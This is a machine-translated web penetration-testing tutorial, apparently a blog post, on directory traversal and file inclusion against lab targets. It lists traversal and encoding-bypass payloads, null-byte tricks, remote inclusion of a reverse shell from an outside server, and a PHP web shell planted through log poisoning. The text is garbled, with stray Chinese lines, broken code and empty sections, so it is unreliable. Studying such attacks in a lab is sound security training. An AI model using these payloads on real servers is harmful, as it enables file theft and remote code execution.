Little white Diary 37:kali Penetration Testing Web Penetration-Manual vulnerability Mining (iii)-directory traversal, file inclusion

Manual vulnerability Mining

Vulnerability type

#Directory Traversal directory Traversal "read files on this machine's operating system"

Users can read the Web root directory "default:/var/www/" Other operating system files (such as:/etc/passwd/) through the browser/url address or parameter variable contents. Root cause: Directory permissions are not strictly restricted

#File include file contains "1, include local file contains lfi;2, remote system file contains RFI (can be passed in Trojan)"

Typically, such as the Include function, you can include directories outside the Web root directory. Root cause: The Include function restricts input variables

#此两种漏洞类型的利用方法和实现效果完全相同.

Note: Some attack vector dictionaries are integrated by default in Kali,/usr/share/wfuzz/wordlist/vulns

##################################################################

By default, metasploitable only file contains a vulnerability, no remote file contains a vulnerability

#修改metasploitable配置文件

sudo vi/etc/php5/cgi/php.ini

/allow_url Search

Sudo/etc/init.d/apache2 Restart Restart Apache Service

##########################################################################

Exploit exploits

First, observe features, characteristics, etc. "such as: page=a.php home=b.html file=content"; then the form or URL address

Classic test methods

/etc/passwd/a file that can be read by an ordinary user, often used for testing

1. file=. /.. /.. /.. /etc/password

Resolution: There are two special directories for both Windows and Linux

. Represents the current directory

.. /indicates the parent directory of the current directory (top level directory)

“.. /"The more the better, is because you can jump to the root directory

#也可以直接使用绝对路径? page=/etc/passwd, but the directory traversal vulnerability is not used, you need to use the ".. /”

2,? page=file:///etc/passwd "File system access, files are required after the absolute path"/etc/passwd

3. home=main.cgi "Source content/configuration information, etc."

4. page=http://www.a.com/1.php (contains other web files) "Remote file contains"

You can make a Web server, put a bounce shell on it

? page=http://1.1.1.1/../../../../dir/file.txt

Encoding bypasses character filtering

When prompted: Cannot find the file, you should be able to determine the filtering mechanism

Prior to php5.3, there was this bypass restriction

“.” "%00" (popular valid, denotes control) "In the PHP language format, when you encounter% 00, then ignore the contents of its back"

For example:? flie=a.doc%00.php

use a variety of coding attempts "every character can do coding attempts, usually, the ASCII code below 128 will not be filtered"

Special characters: "." " /"#英文字符肯定不会被过滤

######################################################################

#不同操作系统的路径特征字符

#类UNIX系统

Root directory:/

Directory-level delimiter:/

#windows系统

C +

Or

######################################################################

Coding

Most commonly used: URL encoding "If a layer of code is not enough to bypass, you can use double or multilayer URL encoding, if: ciphertext can be decoded by the server"

Purpose: The target server can decode the encoding normally, and can see what it wants to see, and can bypass

%2E%2E%2F decoding: /

%2E%2E%5C decoding: \
%252E%252E%255C decoding: \ "Double-layer encoding: Special character% is encoded as%25"

Unicode/utf-8 "Non-English character encoding"

.. %C0%AF decoding: /
.. %u2216
.. %C1%9C decoding: \

#可使用在线工具

######################################################################################

Characters that may be used by other system paths

? File.txt ...
? File.txt<spaces> #空格
? File.txt "" "
? file.txt<<<>>><
?./././file.txt
? nonexistant/. /file.txt #输入一个不存在的目录 "Many operating systems have been filtered"

UNC path "Windows System File Share"

? \\1.1.1.1\path\to\file.txt

Note: The common characters can be encoded in advance, in 22 or any combination, form a dictionary file, using the intruder in Burpsuite to attack can improve efficiency

######################################################################################

Exception: Unable to view any sign from the URL, its cookie in the HTTP request header

Code:

Attack: "Inject location for cookie information"

Results:

Note: Any variable must be validated

##########################################################################################

Example Demo

Local file contains Lfi

View Files

Code Execution "Special case: Implementing code injection through the server's access log"

<?php echo shell_exec ($_get[' cmd ');?

Apache access.log       " Premise: Other users have read permission to the file "

And then access the file in the browser

############################################################### ##############

Note: In a Linux system, when you assign permissions to a file, ensure that the same permissions are assigned to its hierarchical directory

# # # ##########################################################################

 

Remote file contains RFI "relatively local inclusion, low probability"

Verify:

Harm:

Low grade

Medium level

Bypass the idea "filter only once"

1. Coding

2. Mixed characters

High level limit

Little white Diary 37:kali Penetration Testing Web Penetration-Manual vulnerability Mining (iii)-directory traversal, file inclusion